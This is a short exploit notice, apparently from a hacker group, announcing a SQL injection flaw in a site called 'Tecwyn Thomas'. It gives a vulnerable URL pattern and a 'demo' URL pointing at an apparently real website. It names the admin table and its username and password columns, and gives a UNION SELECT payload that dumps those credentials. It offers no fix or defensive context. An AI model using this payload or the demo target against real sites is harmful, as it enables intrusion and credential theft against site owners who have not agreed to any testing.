Tecwyn Thomas suffers from a remote SQL injection vulnerability.
89357f0f65c0c5766e6dc0b1b42b1947afbc41a4494fdc6c52b13a67fa79734f
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title] :[Tecwyn Thomas sql injection vulnerability] /*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://Skote-Vahshat.com] /*
\* [Archive] :[Http://xpl.skote-vahshat.com] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*
=======================================================================
/* Web Server: Microsoft-IIS/6.0
/*Powered-by: ASP.NET
/* [+]Exploit :
/* http://www.target.com/index2.php?id=[SQLi]
/* [+]Demo:
/* http://www.alunpugh.com/index2.php?id=4[SQLi]
/* [+] talbe admin (defnyddiwr)
/* [+] column ( usr_name , usr_wrd)
/* [+] union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,usr_name,16,usr_wrd+from+defnyddiwr
=======================================================================
|_***_| spical thanks : bl4ck.viper all turkiS hackers|
=======================================================================